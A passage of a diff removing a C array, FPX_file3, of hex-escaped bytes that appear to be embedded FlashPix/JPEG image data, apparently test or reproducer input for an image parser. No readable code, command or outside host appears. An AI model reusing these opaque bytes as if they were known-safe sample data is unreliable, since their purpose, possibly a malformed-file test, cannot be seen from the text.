-"\x60\x06\x73\x90\x0f\x07\xf1\x1c\xd5\xbd\x8c\x96\xe1\x45\x14\x54" -"\x96\x14\x51\x45\x00\x15\x4e\xeb\x4b\xb6\xba\xba\x17\x32\xb4\xcb" -; - -unsigned char FPX_file3[] = -"\x28\x4d\x80\xc7\x29\x5e\x33\x9c\x71\x57\x28\xa6\x9b\x5b\x12\xe2" -"\xa5\xa3\x00\xff\xd9\x0d\xc0\xf9\xf1\xfc\x2c\x3a\x1f\xc4\x71\x54" -"\xb5\x56\x25\xe8\xee\x5c\xa4\x65\x0c\xa5\x58\x02\x0f\x50\x69\x68" -"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00" -"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03" -"\x11\x00\x3f\x00\xf4\x7a\x29\x70\x7d\x0d\x51\xbf\x48\x8c\x98\x96" -"\xee\xea\x13\x70\x9e\x42\xac\x2e\x46\x0e\x73\xb8\x60\x70\xde\xfe" -"\x95\x0d\xa5\xb9\x69\x37\xa2\x2e\xd1\x51\xa4\x1e\x54\xd2\xb9\x92" -"\x56\xf3\x31\xf2\xbb\x65\x57\x03\x1f\x28\xed\x9e\xa7\xde\xa4\xa6" -"\x22\x6b\x56\x94\xc2\xfb\xe3\x0b\x86\x21\x30\x73\xb8\x76\x3e\xd5" -"\xc9\x40\x64\x68\x11\xa7\x1b\x64\x23\x2e\x3d\xfb\xd7\x5b\x6d\xe6" 
-"\xf9\x0f\xe7\x14\x1f\x31\xd8\x57\x3f\x77\xb6\x7d\xeb\x91\xb6\x05" -"\x6d\xe3\x0d\x20\x90\x85\x19\x70\x72\x1b\xde\xbc\xdc\xd3\xe0\x8f" -"\xa9\xd7\x82\xf8\x99\x25\x15\x43\x56\x42\xc2\xdc\xba\x49\x25\xb0" -"\x93\xf7\xe9\x18\x27\x23\x69\xc6\x40\xe4\x8c\xe3\x23\xfa\x55\x46" -"\xb6\xb7\x9d\x6d\xe3\xb4\xb7\x9e\x3b\x63\x75\x99\x00\x0c\x8a\xc3" -"\xcb\x6e\xdd\x97\x38\xec\x01\x35\xe4\x46\x9a\x6a\xed\x9d\xce\x6d" -"\x3b\x1d\x04\xb1\x49\x12\x69\xec\xab\x3b\xc9\xb5\x59\xa3\xf9\xb0" -"\x58\xe3\x27\x76\x78\x3f\x5e\x31\x57\x2f\xd1\x6e\x6f\x6c\xe4\x44" -"\x94\xf9\x6f\x22\x93\x82\xb8\xc0\xe3\xf0\xcf\xe7\x51\x7f\x68\x6b" -"\x5f\xf4\x06\x87\xff\x00\x02\x87\xf8\x54\xb6\x1a\x95\xcc\xd7\xe6" -"\xce\xfa\xc8\x5b\x4a\x63\x32\xa6\xd9\x77\x86\x00\xe0\xf6\xe3\xa8" -"\xaf\xa6\xfa\xb3\x49\xea\xbf\x0e\x9f\x33\xcb\xfa\xe2\x6d\x68\xef" -"\xaf\x7e\xbf\x21\xda\x5a\xc9\x0d\x8c\x20\xc1\x23\x33\x80\xce\xef" -"\x92\x76\x82\x57\x23\xd3\x23\x9f\x7e\xf5\x2e\x9f\x66\x52\xa9\xdd" -"\x17\xe8\xa2\x8a\xc0\xe9\x0a\x28\xa2\x80\x12\x25\x58\x4b\x18\x95" -"\x50\xb9\xdc\xdb\x46\x37\x1f\x53\xef\x4e\x8a\x59\xa1\xb6\x2a\xcc" -"\x6e\x24\x50\x70\x5f\x0a\x5b\xd0\x1c\x0c\x7b\x52\x51\x4e\xe2\xb2" -"\x1c\x6e\x2d\xa1\x8f\xed\x97\x2a\x90\x48\xca\xab\x23\x1e\x48\xe7" -"\x81\x91\xd4\x64\x9a\x8e\x5d\x3d\xa3\xd2\xae\xad\x6c\x64\xd9\x2c" -"\xe5\xdb\xcc\x90\xe7\xe6\x72\x49\x3c\x7d\x78\xfa\x0a\x75\x35\xd0" -"\x39\x42\x59\xc1\x46\xdc\x36\xb1\x1c\xfb\xe3\xa8\xf6\xaa\x52\xb1" -"\x0e\x17\x1d\x45\x43\x6b\x1c\xf1\x46\xcb\x71\x3f\x9f\x83\xf2\xb9" -"\x4d\xad\x8f\x7c\x70\x4f\xb8\xc5\x2d\xb5\xd4\x17\x4a\x5a\xde\x55" -"\x7d\xa7\x0c\x3a\x15\x3e\x84\x1e\x47\xe3\x53\x62\x93\xee\x4b\x45" -"\x14\x52\x28\x28\xa2\x8a\x00\x28\xa2\x8a\x00\x2a\x17\xb5\xb7\x92" -"\xe5\x2e\x5a\x25\xf3\xd3\xa4\x83\x86\xfa\x12\x3a\x8f\x63\x56\x67" -"\x8b\x6d\xc1\x97\x7b\x90\xca\x17\x67\xf0\x8c\x13\xc8\xf7\xe7\xf4" -"\x14\xca\x7b\x6c\x4e\xfb\x88\xbb\xb9\xdc\x41\xe7\x8c\x0c\x71\x4b" -"\x45\x14\x8a\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11" -"\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff" -"\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x2b" -"\x32\x2d\x6e\xd0\xe9\xf6\xb7\x37\x0c\x62\x7b\x94\xde\xb1\x2a\x97" -"\x6f\x7c\x05\x04\x91\xef\x57\x2d\xef\x2d\xee\x60\xf3\xad\xe5\x12" -"\xa6\x09\xf9\x79\x3c\x75\x18\xeb\x9f\x6a\xa7\x16\xb7\x44\xa9\xc5" -"\xec\xc9\xe8\xa8\xad\xa6\x17\x16\xf1\xcc\xa8\xe8\x1d\x43\x6d\x91" -"\x76\xb0\xfa\x8e\xd5\x2d\x49\x41\x45\x14\x50\x01\x45\x14\x50\x06" -"\x22\x88\xb4\x7d\x56\x49\x26\x89\xc5\xb3\xc1\x1c\x51\x4a\xa8\x5c" -"\x46\x13\x23\x61\xc0\xe3\xa8\x3e\x86\xb3\xd9\xd6\xea\xe2\xf6\xea" -"\xd1\x65\x82\x4b\xd9\xd2\xca\x36\xc1\x56\x18\xe6\x46\xc7\x51\xc0" -"\x3f\xf7\xc8\xae\x83\xcf\x9f\xce\x4c\x18\xfc\xac\x1d\xe0\x83\xb8" -"\x9e\xd8\x3d\x28\xdf\x6f\x2d\xda\xab\x42\xc1\xe2\x05\xd2\x42\xb8" -"\x00\x9c\x83\x83\xeb\xfe\x35\xaa\xa9\xd7\xa9\x8c\xa9\xf4\xe8\x67" -"\x43\x3e\xa5\x73\xf6\xdb\xbb\x7b\xa8\x63\xb6\x49\x19\x61\x59\x23" -"\x2c\x18\x20\xc1\xc9\xc8\xc0\x2c\x0f\xbd\x59\x4d\x6a\x0f\xb2\xda" -"\xc8\xf1\xcc\x66\xb8\x89\x65\x10\x45\x19\x91\x94\x11\xd4\xe0\x74" -"\xf7\xa7\xcf\xa7\xa3\x68\xaf\xa6\xd9\x38\x89\x0a\x79\x79\xce\xec" -"\x03\xf7\xbf\x12\x33\xf9\xd6\x75\xcd\x92\x5a\x6a\xb7\x13\xc9\x15" -"\xe0\x8e\x55\x41\x0c\xb6\x7b\x89\x8f\x6a\xe0\xa1\x0b\xdb\x8c\x8c" -"\x82\x39\x35\x4b\x96\x42\x7c\xd1\x36\xad\x2e\xa0\xbc\x80\x4d\x6e" -"\xfb\xd3\x24\x1e\x30\x41\x1d\x41\x07\x90\x7d\xa9\x6e\x2e\xed\xad" -"\x9a\x35\xb8\x9e\x38\x8c\xad\xb5\x03\xb0\x1b\x8f\xa0\xaa\x9a\x35" -"\xb3\x45\x1c\xd7\x0e\xf3\x96\xb9\x7d\xe5\x67\x45\x56\x5c\x00\xa3" -"\x21\x78\xce\x00\xac\xbb\xe9\x64\x8f\x52\xd4\x35\x48\xe4\x67\x16" -"\x8a\xb6\xf1\xc2\xc0\x32\xc9\x23\x00\x4a\x8e\xe3\x92\x9d\x3d\x0d" -"\x4a\x82\x72\x69\x14\xe6\xd4\x53\x67\x4b\x45\x57\xb3\x6b\xb6\x8b" -"\x37\xb1\xc5\x1b\xf6\x11\xb9\x6f\xcf\x20\x55\x8a\xc9\xe8\x68\x9d" 
-"\xca\x34\x51\x45\x49\xa0\x91\xa2\xc5\x23\xc9\x1a\x2a\x3b\x9c\xb9" -"\x03\x05\x8f\xbf\xad\x3e\x19\x65\x8a\x36\x0e\xe6\x76\xc9\x20\xb0" -"\x0b\xf4\x1c\x0a\x6d\x14\xee\x2b\x22\x45\xbd\x44\xb4\xf3\xee\xc0" -"\xb7\xc2\xe5\xc1\x39\x0b\xf8\x8a\x84\xe9\x76\xec\xb0\x79\x6c\xc1" -"\x12\xe0\xdc\xb0\xce\x7c\xc6\x39\x3c\x9f\xa9\xcf\xe0\x29\xd4\xd9" -"\x10\x48\xaa\x0b\x3a\xed\x60\xc3\x63\x15\xe4\x7d\x3f\x95\x52\x95" -"\x88\x70\xb9\xa1\x45\x53\x69\xe7\xf3\x23\xd9\xe5\xec\xcf\xcf\xb8" -"\x1c\x91\xed\x53\xc1\x71\x14\xfb\xfc\xa7\x0d\xe5\xb6\xc7\x03\xf8" -"\x5b\xae\x0f\xe6\x29\x0c\xad\x45\x14\x54\x96\x14\x51\x45\x00\x14" -"\x51\x45\x00\x15\x9d\x34\xaa\xd7\x32\x88\xf2\x0a\x36\xd6\xe3\x1c" -"\xe0\x1f\xc7\xa8\xad\x1a\xce\x9e\x4d\xf7\x12\x0d\xac\xbb\x1b\x6f" -"\xcc\x31\x9e\x3a\x8f\x6e\x69\xa2\x58\xff\xd9\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40" -"\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c" -"\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\xa3\xb1\xd1\x9c" -"\x3c\x86\x42\x5c\x90\x48\xc6\x01\x3c\x0f\xc3\xa5\x5e\xaa\x3e\x59" -"\x8d\xdd\x77\xbb\xe5\xcb\x65\x8e\x48\xc9\xce\x3e\x83\xb5\x0f\x60" -"\x5b\x85\x14\xb8\x23\xb1\xa3\x07\x38\xc1\xcd\x49\x62\x51\x4b\x83" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00" -"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00" -"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x29\x92\xcb\x1c\x29\xbe\x69\x16\x35\xf5\x63\x81\x49\xe6\x1f" 
-"\x38\x20\x8d\x88\xc6\x4b\xf6\x14\x58\x57\x24\xa6\x49\x2c\x71\x01" -"\xe6\x38\x5c\xf0\x33\xde\x98\x23\x95\xd5\xc4\xd2\x00\x1b\xa7\x97" -"\xc6\x3f\x1a\x86\xe2\xea\xce\xc0\x47\x1c\xae\x37\x9f\xb8\x9f\x79" -"\xdb\xe8\x3a\x9a\x69\x5c\x4d\xdb\x52\x7f\x31\xcc\xc5\x04\x4d\xb4" -"\x0f\xbe\x4f\x15\x14\xcc\x90\xdb\x3b\x5f\xdc\xa2\x27\x52\xc1\xb6" -"\x00\x3e\xb9\xaa\xfe\x76\xa5\x79\xc4\x11\x0b\x38\x8f\xf1\xcd\xcb" -"\x9f\xa2\xf6\xfc\x6a\x48\x34\xb8\x23\x94\x4d\x31\x7b\x99\x87\x3e" -"\x64\xa7\x38\xfa\x0e\x82\xaa\xc9\x6e\x4d\xdb\xd8\xff\xd9\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11" -"\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff" -"\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28" -"\xa2\x80\x20\xbd\x99\xad\xed\x24\x92\x34\x32\x38\x18\x55\x1d\xcf" -"\x6a\xc7\x3a\x9e\xa2\x22\x8d\x25\x44\x86\x48\xd9\x44\xce\xea\x48" -"\xe5\xb1\x9e\x3b\x63\x9e\xb5\xbf\x45\x00\x61\xb6\xb1\x74\x14\x95" -"\x81\x18\x8f\xba\x00\x6f\xde\xf5\xf9\x97\xdb\x8a\x47\xd6\x2f\x91" -"\xe5\x56\xb5\x40\x63\x5c\xf3\x9e\x78\x1c\xfd\x39\xad\xda\x4a\x00" -"\xc7\x7d\x5e\xe0\x42\xf2\x2c\x28\x58\x1c\x08\xc8\x21\x94\x64\x7c" -"\xc7\xdb\xbd\x30\x6a\xf7\xc2\x16\x9b\xec\x41\xd5\x40\xf9\x13\x25" -"\x9c\x90\x7a\x7e\x43\xf3\xad\xba\x5a\x00\x28\xa2\x8a\x00\x28\xa2" -"\xab\xdf\x09\x9a\xd8\xad\xbb\x32\x39\x65\x1b\x94\x02\x40\xc8\xc9" -"\xe7\xdb\x34\x01\x62\x92\xb0\xa7\x6d\x55\x67\x22\xdf\xed\x2c\xc1" -"\x9c\x36\xe5\x1b\x36\xff\x00\x09\x07\xd7\xfa\xd2\xba\x5e\xc9\x3c" -"\x3f\x67\x6b\xa0\x84\xed\x79\x25\x50\x18\x0c\x8c\xe3\xf5\xa0\x0d" -"\xda\x4a\xc0\x07\x5a\x17\x71\xa9\x2f\xe5\xa9\x00\x1d\xb9\xdc\x37" -"\x1c\x96\xfc\x31\x56\x6e\xd6\xe1\xf5\xad\xb0\xbb\xa7\xcb\x1e\xe2" -"\xbd\x93\x2d\x9f\xd4\x0a\x00\xd7\xa2\xa3\x92\x68\xe2\x2a\x1d\x80" -"\x2c\x70\x07\xad\x27\x98\xfb\xd8\x18\xf6\x20\x1f\x7d\x88\xfe\x54" -"\x58\x57\x25\xa8\xde\x68\xd2\x45\x8d\x9b\xe6\x6e\x80\x0c\xd6\x6b" 
-"\xdf\xc7\x2a\xb5\xbc\x41\xf5\x09\x33\xc8\x88\x6d\x51\xec\x5b\xa5" -"\x3d\x6c\xef\x6e\x54\x0b\xb9\xfe\xcf\x16\x31\xe4\xdb\x12\x0e\x3d" -"\x0b\x75\xfc\xb1\x57\xcb\x6d\xc8\xe7\xbe\xc3\xee\x75\x38\xe0\x95" -"\xe2\x6f\xbf\xd1\x55\x3e\x77\x63\xfe\xe8\xfe\xb5\x52\x5d\x43\x50" -"\x8c\x44\x1d\x16\x32\xc7\xe5\x8c\x80\xd2\xcb\xf8\x0e\x14\x7b\xd4" -"\xee\xd6\xfa\x79\x16\x9a\x6d\xba\xb5\xd3\x8c\xed\x1d\x87\xf7\x98" -"\xf5\xc5\x58\xb1\xb1\x16\xec\xd3\x4c\xfe\x75\xcb\xfd\xf9\x0f\xf2" -"\x1e\x82\xab\xdd\x4a\xf6\x27\xde\x93\xb5\xc8\x12\x7b\xef\xb4\xa5" -"\xb4\xad\x12\xcb\x24\x2c\xff\x00\x2a\xe4\x29\xc8\xc0\xf7\xeb\x55" -"\x1b\x53\xd4\xad\xae\xfc\xab\xab\x78\x89\x6e\x10\x29\xc6\xef\xf7" -"\x58\xf0\x7e\x87\x15\x7a\x4f\xf9\x18\x21\xff\x00\xaf\x76\xff\x00" -"\xd0\x85\x5c\xb8\x82\x1b\x98\x5a\x2b\x88\xd6\x48\xdb\xaa\xb0\xc8" -"\x34\x5d\x2d\xd0\xf9\x5b\xd9\x99\xe9\x7b\x24\xca\x13\x4b\xb4\x2e" -"\x80\x60\x4d\x2e\x55\x31\xed\xdc\xd3\xc6\x96\xd3\x9d\xda\x95\xc3" -"\xdc\x1f\xf9\xe6\x3e\x58\xc7\xe1\xdf\xf1\xad\x1a\x2a\x79\xbb\x15" -"\xc9\xdc\x64\x71\xa4\x48\x12\x34\x54\x51\xd0\x28\xc0\xaa\x37\x37" -"\x92\xcd\x33\x5a\x69\xc4\x19\x47\x12\x4c\x46\x56\x2f\xf1\x3e\xd4" -"\xc7\xb8\x97\x52\x73\x0d\x83\x94\xb7\x04\x89\x2e\x47\x7f\x50\x9f" -"\xe3\x57\xad\xad\xa2\xb5\x80\x45\x02\x05\x41\xfa\xfb\x9a\x2d\xcb" -"\xab\xdc\x2f\xcd\xa2\xd8\x65\x95\x94\x56\x71\x90\x85\x9d\xd8\xe5" -"\xe4\x7e\x59\xcf\xa9\x35\x66\x9a\xcc\x17\x1b\xb8\xcf\x14\xdf\x3a" -"\x33\x8f\x9b\xaf\xb5\x4b\x77\xd5\x94\x92\x5a\x22\x9c\xbf\xf2\x30" -"\x41\xff\x00\x5e\xef\xfc\xc5\x68\x56\x7c\x87\x76\xb1\x0c\xe3\x3e" -"\x58\x81\x81\x6c\x77\xc8\xab\x66\x78\xc6\x7e\x6e\x83\x3d\x0d\x39" -"\x74\x14\x7a\x80\xff\xd9\xf3\x55\xc1\x5c\x0e\xbc\xf4\xa8\xe0\xd4" -"\xf4\xfb\x88\x64\x9a\x0b\xeb\x69\x62\x8b\x99\x1d\x25\x52\x13\xea" -"\x73\xc5\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22" -"\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11" -"\x03\x11\x00\x3f\x00\xee\xa5\xd5\xee\x90\xc6\x22\x8e\x29\xc3\x75" 
-"\x74\xc8\x07\xa7\x03\x3d\xf9\xa7\x5e\xdd\xdc\x47\x7f\x2a\xc7\x33" -"\x86\x5d\x9e\x5c\x21\x32\x1f\x3d\x79\xc5\x6c\x52\xd0\x07\x3b\x26" -"\xa1\xa8\xac\x29\xe7\xee\x88\x88\xc3\x97\x55\xe1\xf9\xe8\x38\xe0" -"\xd7\x41\x19\xdd\x1a\xb7\x3c\x80\x79\xeb\x4b\x4b\x40\x05\x14\x51" -"\x40\x05\x14\x51\x40\x05\x26\x6b\x06\x36\xd5\xbc\xb5\xf3\x3e\xd1" -"\x92\x17\xed\x18\x51\x95\x6c\xf3\xe5\xfa\x8a\x8e\x78\xef\x30\x67" -"\x9d\xa5\x19\x44\x48\xf7\xf1\x93\xe6\x8d\xb9\x1e\xb8\xc5\x00\x74" -"\x74\x51\x45\x00\x14\x51\x45\x00\x14\x51\x45\x00\x66\x5b\x6a\xaa" -"\xca\x63\x9b\x8b\x80\x7f\xd5\x32\xf9\x6c\x7f\x02\x7f\x91\x35\x7b" -"\xce\x8f\x28\xae\x42\xb3\xf2\x15\xb8\x35\x97\x71\x63\x25\xb4\x7b" -"\x0c\x5f\x6f\xb3\x1f\xf2\xc9\xf9\x92\x31\xfe\xc9\x3d\x7f\x9d\x16" -"\xd1\x33\x44\x25\xd2\x6f\x3c\xc8\xc1\xff\x00\x51\x71\xf3\x05\x3e" -"\x99\xea\xb5\xab\x8c\x5e\xa8\xc5\x4a\x4b\x46\x6c\xd1\x59\x2b\x7c" -"\xb6\xf2\xb1\xbe\x86\x5b\x47\x6e\x37\xe7\x74\x64\xfa\xe7\xb7\xe3" -"\x8a\xbd\x1c\x92\x7d\x9c\x3a\x95\xb9\xe7\x83\x19\x03\x23\xf3\xc5" -"\x43\x8b\x46\x8a\x49\x96\x28\xa8\x8c\xf1\xab\x22\x48\x76\x3b\x8e" -"\x15\xbf\x97\xa5\x49\x52\x50\xb4\x51\x45\x00\x15\x4a\xeb\x4e\x59" -"\x25\xfb\x45\xb3\x9b\x7b\x9f\xf9\xe8\xbd\x1b\xd9\x87\x7a\xb6\xae" -"\xac\x48\x53\x9c\x53\xa9\xa6\xd6\xc2\x69\x3d\xcc\xe8\xaf\xca\xc8" -"\x2d\xb5\x38\xc4\x32\x37\x0a\xdd\x63\x93\xe8\x7f\xa1\xa5\x7d\x2a" -"\x25\x73\x25\x8c\xaf\x67\x21\xe7\xf7\x7f\x74\xfd\x54\xf1\x57\x27" -"\x86\x2b\x88\x8c\x53\x22\xba\x37\x50\xc2\xb3\xfc\xbb\xbd\x37\x98" -"\x37\xdd\xda\x8f\xf9\x64\x4e\x64\x41\xfe\xc9\xef\xf4\xab\x4f\xb6" -"\x86\x6d\x5b\x7d\x47\x7d\xa6\xfa\xd7\x8b\xdb\x61\x70\x83\xfe\x5a" -"\xdb\x8f\xe6\xa7\x9f\xc8\x9a\x9a\xd2\x5b\x3b\x92\xf2\x5a\x4a\x37" -"\xb7\xde\xc1\xe4\x1f\x70\x7b\xd4\xb6\x97\x70\x5e\x43\xe6\xdb\x48" -"\x1d\x73\x83\xc6\x0a\x9f\x42\x0f\x20\xfb\x54\x77\x5a\x75\xad\xd3" -"\x6f\x92\x3d\xb2\x0e\x92\x21\xda\xc3\xf1\x14\xae\xb6\x7a\x0e\xcf" -"\x75\xa9\x2f\xef\xe3\x8b\xb4\xec\x0f\xfb\xbc\x52\x99\xd1\x64\x54" 
-"\x7c\xab\x37\x41\x8f\xeb\x54\xbc\xbd\x4a\xcf\xfd\x5c\x8b\x7b\x10" -"\xfe\x19\x3e\x57\x1f\x8f\x43\x52\x43\xaa\x5b\x49\x2a\xc1\x36\xeb" -"\x69\xdb\xa4\x53\x0d\xa4\xfd\x3d\x7f\x0a\x39\x7b\x0f\x9b\xbe\x80" -"\xff\xd9\xad\x4a\xb6\x5a\x4d\x96\x91\xa6\x86\x37\x76\x86\x74\x12" -"\xdc\x12\x22\x00\x8f\xbc\xc4\x12\x47\xcd\xfc\xab\x62\xd4\xff\xd8" -"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" -"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f" -"\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28" -"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28" -"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28" -"\xa2\x80\x10\x10\x7a\x1a\x5a\x8b\xc8\x8c\x33\xb2\x0d\x8c\xfd\x59" -"\x69\xb8\x9e\x38\x80\x42\x26\x60\x7f\x8b\xe5\xc8\xfc\x29\x8a\xe4" -"\xf4\x54\x7e\x68\x12\x2a\x32\x38\x24\x75\xdb\x91\xf9\xd3\xc1\x04" -"\x64\x10\x7e\x94\x86\x2d\x14\x51\x40\x05\x14\x51\x40\x00\xff\xd9" -"\x3d\x32\xc6\x28\x41\xca\xda\xa6\xf6\x94\xe3\xfb\xc5\x46\xd1\xdf" -"\x8e\x7d\xe8\x02\x6f\x16\x4f\x25\xbf\x86\x2f\xde\xff\xd8\xff\xc0" -"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11" -"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5" -"\x5a\x6b\xae\xe4\x2b\xb8\xae\x7b\x8e\xa2\xa3\x92\x29\x1d\xb2\xb3" -"\xba\x0c\x74\x00\x54\xa3\x81\xeb\x40\x0d\x48\x95\x55\x47\x2c\x57" -"\xa1\x63\x93\xf9\xd2\x4d\x3c\x36\xe9\xbe\x79\x52\x35\xf5\x63\x81" -"\x52\x55\x7b\xab\x5f\xb4\x34\x6e\xb2\xb4\x52\x46\x4e\xd6\x50\x0e" -"\x33\xc1\xeb\xc5\x00\x54\xbc\x95\x26\x97\x68\xd4\xd2\x08\x54\x65" -"\xc4\x64\x6e\x3f\xf0\x2e\xd5\x2e\x9d\x0e\x9f\x19\x73\x62\x63\x67" -"\x3c\xbb\x86\xdc\xcd\xf5\x3d\x4d\x31\xb4\x78\x5e\x40\xcf\x2c\x8c" -"\xaa\xfb\xc2\x9c\x70\xc4\x82\x4f\x4f\x6a\xb1\x6d\x65\x15\xb3\xee" -"\x8f\x3f\x77\x6f\xea\x4f\xf5\xa7\xcc\xed\x62\x79\x55\xee\x59\xa2" -"\x8a\x29\x14\x14\x51\x45\x00\x14\x51\x45\x00\x14\x51\x45\x00\x14" -"\x51\x4d\x77\x54\x52\xce\x42\xa8\xea\x4d\x00\x3a\x8a\x28\xa0\x02" 
-"\x8a\x42\x40\x19\x27\x02\xa2\x6b\x85\x07\x0a\x0b\x73\x83\x8e\xd4" -"\x01\x35\x46\xf3\x22\x70\x4e\x48\x38\x20\x73\x55\xda\x47\x71\x87" -"\x38\x04\x60\x81\xd2\x9b\x4a\xe3\xb1\x23\x4e\xed\xf7\x46\xd1\xcf" -"\xbd\x47\x8f\x9b\x71\xe5\xb1\x8c\x9e\xb8\xa2\x91\x98\x2a\x96\x62" -"\x00\x1d\x49\x3d\x28\x1d\x8b\xae\xea\x80\x16\x20\x64\xe2\xa1\x6b" -"\x82\x7e\xe2\xe3\xaf\x27\xb5\x17\x5f\xc1\xd7\xbf\x4e\x95\x0d\x0d" -"\x89\x21\x58\x96\xfb\xe7\x76\x7a\xfa\x7e\x54\x94\x51\x48\x61\x45" -"\x14\x8e\x0b\x21\x0a\xdb\x49\xef\x8e\x94\x0c\x6b\xca\xa8\xca\xa7" -"\x25\x9b\xa0\x03\x34\x8a\x8c\x4b\x79\xac\x19\x49\xe1\x71\xc0\xa6" -"\xb4\x91\xda\xc3\x19\x99\xf6\x86\xce\x37\x1c\xb1\xc5\x46\x35\x0b" -"\x73\x8f\x9f\x1c\x7a\x1a\x52\x9c\x63\xa3\x62\x49\xc8\xff\xd9\xa6" -"\xe2\x49\x2d\x23\xbc\x92\x33\x30\x46\x54\x7e\x81\x72\x3e\x63\xc1" -"\xf4\x1d\x39\xe6\xa9\xd8\xe9\x17\x91\xe8\x56\xff\xd8\xff\xc0\x00" -"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" -"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x42" -"\x70\x32\x78\x15\x46\xea\x6b\x1b\xb8\x0c\x4f\x76\xa1\x18\xfc\xc1" -"\x5f\x1b\x80\xea\x0f\xb5\x5d\x91\x04\x91\xb4\x6d\xf7\x58\x10\x6b" -"\x32\x4d\x15\x0a\x3b\x09\x59\xa5\x29\xb1\x59\x80\x00\x01\x8c\x74" -"\xfa\x51\x7b\x03\x57\x2f\xda\x3d\xbb\x5b\xa8\xb4\x64\x31\x27\xca" -"\x02\x74\x18\xed\x53\x55\x3d\x36\xd6\x4b\x58\x64\x13\xc8\x24\x92" -"\x49\x0b\xb1\x03\x03\x9f\xff\x00\x55\x5c\xa0\x08\x2e\xb3\xb5\x7a" -"\xf5\xed\xfd\x6b\x23\x53\xba\x9a\x19\x12\x38\x8e\xdc\x8d\xc4\xf5" -"\xfc\x2b\x5a\xe8\x83\xb4\x70\x48\x39\xeb\xd2\xb1\x35\x84\x61\x34" -"\x72\x6d\x25\x76\x90\x48\x5c\xe3\x9a\xe6\xc5\x39\x2a\x4d\xc3\x73" -"\x5a\x2a\x2e\x6b\x9b\x62\x8c\xba\xbc\xd0\xca\x91\x49\x73\xb5\x9c" -"\x64\x12\xa3\xb5\x5a\x82\xfe\xe7\xed\x11\x87\x7d\xea\xcc\x01\x18" -"\x03\xad\x67\x4d\x6e\x93\x4a\x8e\xc1\xf2\xa4\x63\x00\xfa\x83\xfd" -"\x2a\xc4\x0a\xd2\x5c\xc2\x11\x09\xf9\xd5\xb9\x07\x81\x9e\xb5\xe4" -"\xd2\xab\x5d\xce\x2a\xef\x7d\x4e\xe9\xc2\x92\x8b\xd8\xec\x29\x09" 
-"\xc0\xc9\xa8\x5e\xe3\x07\x08\xb9\xc1\xc1\x26\xa1\x66\x67\xfb\xed" -"\x9e\xde\xd5\xef\x9e\x61\x61\xe7\x45\xc8\x1f\x31\x18\xe0\x54\x2d" -"\x34\x8c\x7a\xed\x00\xf6\xee\x29\x9d\x05\x43\x96\x9e\x33\xb0\xbc" -"\x43\x3f\x7b\x1c\x91\xed\x48\x63\xb7\xa2\xb8\x89\x0e\x5c\x2f\x03" -"\xd3\xeb\x54\xe4\xb9\xb8\x91\xcd\xad\xb3\x2b\xcf\xff\x00\x2d\x24" -"\xc7\xcb\x10\xfe\xa7\xda\x89\x67\x92\xf2\x56\xb7\xb1\x3b\x51\x4e" -"\xd9\x6e\x07\x62\x3a\xa8\xf5\x3f\xca\xae\x5b\x5b\xc5\x6d\x08\x8a" -"\x15\xda\xa3\xf3\x27\xd4\xd5\xe9\x1d\xf7\x23\x59\x6d\xb1\x8f\x25" 